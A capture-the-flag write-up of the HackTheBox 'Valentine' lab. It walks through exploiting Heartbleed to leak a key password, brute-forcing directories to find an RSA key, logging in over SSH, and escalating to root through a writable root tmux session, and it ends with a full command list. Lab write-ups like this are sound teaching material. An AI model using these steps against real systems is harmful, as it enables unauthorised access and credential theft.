We used HackTheBox Valentine machine to demonstrate HeartBleed Vulnerability and privilege escalation through tmux terminal multiplexer. Valentine is a very unique medium difficulty machine which focuses on the Heartbleed vulnerability, which had devastating impact on systems across the globe.
Heartbleed Vulnerability Exploitation
My initial step was to exploit the Heartbleed vulnerability.
- The machine was running an older version of OpenSSL, making it susceptible to Heartbleed.
- This vulnerability allowed me to send random data to the server, and in return, the server responded with random chunks of its memory.
- By exploiting Heartbleed, I managed to reveal a Base64 encoded string.
- Decoding this string provided me with a password for an RSA private key.
- I explored multiple ways to test for and exploit Heartbleed:
- Using an Nmap script:
nmap --script ssl-heartbleed <target_ip> -p 443
- Using the
ssl-scan
tool:ssl-scan --heartbleed <target_ip>
- Using a Python exploit script that I found via
searchsploit
. I ran it like this:python heartbleed.py 10.10.10.79
.
- Using an Nmap script:
- To automate the process of extracting useful data, I used a
for
loop in Bash, piping the output togrep -v "00000000"
to filter out empty lines. - Once I had the Base64 string, I decoded it using:
echo "<base64_string>" | base64 -d
.
Directory Brute-forcing and RSA Key Discovery
After obtaining the password, my next step was to find the RSA private key.
- I performed directory brute-forcing using
gobuster
. My command looked something like this:Bashsudo gobuster dir -u http://10.10.10.79 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
- This revealed a directory named
/dev/
, which contained a file with hex-encoded content calledhype.key
. - I downloaded the file using
wget https://<target_ip>/dev/hype.key --no-check-certificate
. - To decode the hex content into an ASCII RSA private key, I used
xxd
:cat hype.key | xxd -r -p > rsa_encrypted
.
SSH Access
With the encrypted RSA key and its password, I could finally gain SSH access.
- I used the password I found earlier to decrypt the RSA private key using OpenSSL:
openssl rsa -in rsa_encrypted -out rsa_decrypted
. - Then, I used the decrypted private key to log in via SSH as the user “hype”:
ssh -i rsa hype@10.10.10.79
. - Once logged in, I quickly checked the system information with
uname -a
.
Privilege Escalation via Tmux
Now that I had a user shell, my focus shifted to privilege escalation.
- I investigated running processes and found a Tmux session running as
root
by usingps aux | grep tmux
. The session was located at/dev/dev_session
. - I checked the permissions of the Tmux session file using
ls -la /dev/
. I discovered that the “hype” user had write access to this Tmux session file. - By attaching to this existing Tmux session, I effectively gained root access. The command I used was:
tmux -S /dev/dev_session
. - From there, I navigated to the root directory (
cd /root
) and retrieved theroot.txt
flag usingcat root.txt
.
Technical Commands I Used:
Here’s a comprehensive list of the commands I used or referenced during the walkthrough:
- Nmap:
nmap <target_ip>
nmap --script ssl-heartbleed <target_ip> -p 443
- SSLScan (or SSLyze):
sslyze --heartbleed <target_ip>
- SearchSploit:
searchsploit heartbleed
searchsploit -m <exploit_path>
- Python (for running exploits):
python <exploit_script.py> <target_ip>
python heartbleed.py 10.10.10.79
- Grep:
grep -v "00000000"
- Bash For Loop:
for i in $(seq 1 100); do python <exploit.py> <target_ip> | grep -v "00000000" > output$i; done
- Echo and Base64:
echo "<base64_string>" | base64 -d
- GoBuster:
sudo gobuster dir -u http://10.10.10.79 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html
- Wget:
wget https://<target_ip>/dev/hype.key --no-check-certificate
- Cat:
cat hype.key
- xxd:
cat hype.key | xxd -r -p
cat hype.key | xxd -r -p > rsa_encrypted
- OpenSSL:
openssl rsa -in rsa_encrypted -out rsa_decrypted
- SSH:
ssh -i rsa hype@10.10.10.79
- uname:
uname -a
- ps:
ps aux | grep tmux
- ls:
ls -la /dev/
- Tmux:
tmux -S /dev/dev_session
- cd:
cd /root
- cat (for flag):
cat root.txt
- Curl (seen in the root flag content):
curl -i -X POST -A "..." http://<target_ip>/decode.php --cookie "..." --data-binary "text=..." -o /dev/null
Video Walkthrough
Show Comments